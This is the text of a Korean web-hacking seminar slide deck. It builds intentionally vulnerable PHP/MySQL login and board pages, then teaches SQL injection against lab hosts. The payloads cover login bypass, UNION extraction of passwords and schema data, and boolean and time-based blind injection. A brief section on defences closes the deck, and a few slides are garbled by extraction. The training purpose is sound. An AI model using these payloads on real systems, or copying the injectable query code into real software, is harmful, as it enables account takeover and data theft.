1. Web vulnerability seminar
from make to exploit

2. Contents
$ PHP + Source code auditing
$ DB + SQLi
$ XSS & CSRF
$ Something Else
$ Finish

3. Login Page
$ Login Process
<?
$id = "justlife3";
$pass = "password";
if($id == $_GET[id] &&
$pass == $_GET[pw])
echo "Hello!";
else
echo "You are not justlife3";
?>

4. DB
Column
Table
Row

5. DB
기본 패스워드 : apmsetup
mysql –uroot -p

6. 패스워드 변경하고 가실게요
$ UPDATE mysql.user SET
password=passowrd(‘사용할암호’) WHERE
user=‘root’
$ 뜻을 알건 모르건 일단 바꾸고 봅시다..

7. DB
$ 어떤 db가 있나 보자
> show databases;
$ db를 사용하기 위해 선택하자.
> use database_name
>ex) use mysql;

8. 내 DB 만들기
$ CREATE DATABASE db_name
> CREATE DATABASE webhacking;
$ CREATE TABLE table_name(
column name type option,…)
> CREATE TABLE member(
user_id varchar(20) NOT NULL,
user_pw varchar(20) NOT NULL,
nickname varchar(20),
PRIMARY KEY(user_id));

10. 값을 넣어보자.
$ INSERT INTO tablename values(a1,a2..);
> INSERT INTO account values(‘sakuya’,’1234’,’SAKUYA’);
$ INSERT INTO
tablename(c1,c2..)
values(a1,a2..);
> INSERT INTO
member(user_id, user_pw, nickname)
value(‘sakuya’,1234 , user_id);

11. 연달아서 입력
$ INSERT INTO member values
('sakuya','1234','SAKUYA'),
('fear2fear','4321','131ackcon'),
('commio0','bluebit','redbit'),
('python','URYY',user_id),
('ruby',abs(-1234),'sapphire');
$ 함수, 컬럼도 가능함
$ Mysql 주석 : #, --, /**/

12. 조회
$ SELECT column FROM tablename WHERE
condition
> SELECT nickname FROM member WHERE
user_id=‘sakuya’;
$ SELECT * FROM tablename WHERE
contidion
> SELECT * FROM member WHERE
user_id=‘sakuya’;

13. 결과

14. PHP + SQL!
<?
$ip = "127.0.0.1";
$user = "root";
$pass = “db_pass";
$db = "webhacking";
$conn = @mysql_connect($ip,$user,$pass);
$dbs = @mysql_select_db($db);
?>
db_conn.php

15. 가입 페이지 만들기
$ 가입 페이지의 개략적인 형태
<?
include ‘db_conn.php’
$inp_id = $_POST[id];
$inp_pw= $_POST[pw];
$inp_nick = $_POST[nick];
//Send to Mysql
$query = ‘INSERT INTO account values
(‘.$inp_id.’,’.$inp_pw.’,’.$inp_nick.’)’
?>

16. 로그인 페이지 만들기
$ 로그인 페이지의 개략적인 형태
<?
include ‘db_conn.php’
$inp_id = $_GET[id];
$inp_pw= $_GET[pw];
$query = ‘SELECT * FROM account WHERE
user_id =’.$inp_id.’ and ‘.$inp_pw;
$row =mysql_fetch_array(mysql_query($query,$conn))
if($row)
echo “Hello, ”$row[user_id];
else
echo “Who are you?”
?>
web/2/login/join.php
web/2/login/_login.php

17. $row
mysql_fetch_array?
$row = array(
‘user_id’ =>’1’
‘user_pw’ => ‘2’
‘nickname’ =>’3’
);
$row = array(‘1’,’2’,’3’);
PHP array = Python dictionary + list

18. Injection?

19. 그래서?

20. 결론
$ 무언가의 양식에 맞춰서 원하는 값을 넣는
것.
$ SQL injection => SQL 구문에 맞게
$ HTTP Header injection => HTTP에 맞게
$ Mail Header injection => Header에 맞게

21. 응용해 봅시다.
$inp_id = $_POST[id];
$inp_pw = $_POST[pw];
$q = 'SELECT * FROM login WHERE id="'.$inp_id.'" and
pw="'.$inp_pw.'"';
$row = mysql_fetch_array(mysql_query($q,$conn));
if($row)
{
if($row[id]=='admin')
echo "Congraz! Key is ".$authKey."<br>";
echo "Hello, ".$row[id]."<br>";
}
else
echo "Who are you?";
192.168.0.69/web/2/bypass/login.php

22. 풀이
SELECT * FROM login
WHERE id="'.$inp_id.'""or 1=1# and pw="'.$inp_pw.'"'

23. Challenge! +10분휴식
192.168.0.69/web/2/bypass/login2.php
192.168.0.69/web/2/bypass/login3.php
192.168.0.69/web/2/bypass/login4.php

24. Login2
SELECT * FROM login
WHERE id= ' and pw=md5(' $inp ')$inp '‘|| 1=1#

25. Login3
SELECT * FROM login
WHERE id= ' and pw=md5(' $inp ')$inp '‘|| id=“admin”#

26. LIMIT

27. Login3
SELECT * FROM login
WHERE id= ' and pw=md5(' $inp ')$inp '‘||1=1 limit 2,1#

28. Login4
SELECT * FROM login
WHERE id=0x61646d696e

29. Advanced Injection
$ 3 + 3 = ?
$ abs(-60)+60 = ?
$ ord(‘a’)+ord(‘a’) = ?
$ “” + “A” = ?
UNION
SELECT ‘A’ + SELECT ‘B’ = ?

30. UNION
$ SELECT nick FROM members
UNION
SELECT pw FROM login
컬럼 개수가 맞아야 함

31. 알아야 될 정보들
$ SELECT column FROM table
$다른 DB의 정보를 조회!
>SELECT column
FROM dbname.table
SELECT table_name
FROM information_schema.tables;

32. INFORMATION_SCHEMA
$ Mysql 전용!

33. Do IT!
show tables show columns

34. 최종
web/2/adv/board/view.php?num=1
union select 1,pw,3,4,5,NULL,7
from board
where no=5#

35. Blind 방식
$ if 문을 사용
$ Sleep() 계열을 사용

36. if 구문
$ if(조건,참,거짓)
$ if(1,1,0) -> 1 출력

37. @_@ㅋㅋㅋ
$ if(ascii(substr((select table_name from
information_schema.tables limit
1,1),1,1))<0,5,3)

38. 분해 + 조립
$ if(ascii(substr((select table_name from information_schema.tables limit 1,1),1,1))<0,5,3)
$ 초록->주황->빨강->파랑

39. SELECT문
$ (select table_name from
information_schema.tables limit 1,1)
$ information_scehma.tables 에서
table_name을 조회하고 값을 하나 가져온
다.

40. Substr문
$ substr(str,a,b)
> str에서 a번째 부터 b번째 까지 문자를 가져온
다.
> python의 str[a:b]와 같음.

41. ascii문
$ ascii(a)
> a의 값을 아스키코드로 변환해서 돌려줌.
> python 의 ord와 같음

42. ascii의 값을
$ if로 넣어서 비교.
> 그 이후 참/거짓에 따라서 값을 반환.
if( <0,5,3)(select table_name from information_schema.tables limit 1,1)substr( ,1,1)ascii( )COLLATIONS

43. ascii의 값을
$ if로 넣어서 비교.
> 그 이후 참/거짓에 따라서 값을 반환.
if( <0,5,3)substr( ,1,1)ascii( )COLLATIONS

44. ascii의 값을
$ if로 넣어서 비교.
> 그 이후 참/거짓에 따라서 값을 반환.
if( <0,5,3)ascii( )C 67

45. ascii의 값을
$ if로 넣어서 비교.
> 그 이후 참/거짓에 따라서 값을 반환.
if( <0,5,3)67
3

46. DO IT!
$ if(ascii(substr((select table_name from
information_schema.tables limit
1,1),1,1))<0,5,3)

47. SLEEP?
$ if(ascii(substr((select table_name from
information_schema.tables limit
1,1),1,1))<0,sleep(1),3)
$ 리턴시간을 보고 참/거짓을 판별
$ sleep(인자) 를 엄청 크게 주면 서비스 안
함..

48. 어떻게 할 것인가
$ PHP.ini => magic_quoat 옵션 ON
> ‘, %00 등의 문자 앞에 를 붙여서 스트링으
로 인식하게 해줌
> magic_quoat 도 특수한 경우엔 우회가 가능함
$ Black List ? White list ?
> ex) 숫자의 입력을 받는곳에 문자열의 입력은
필요없다.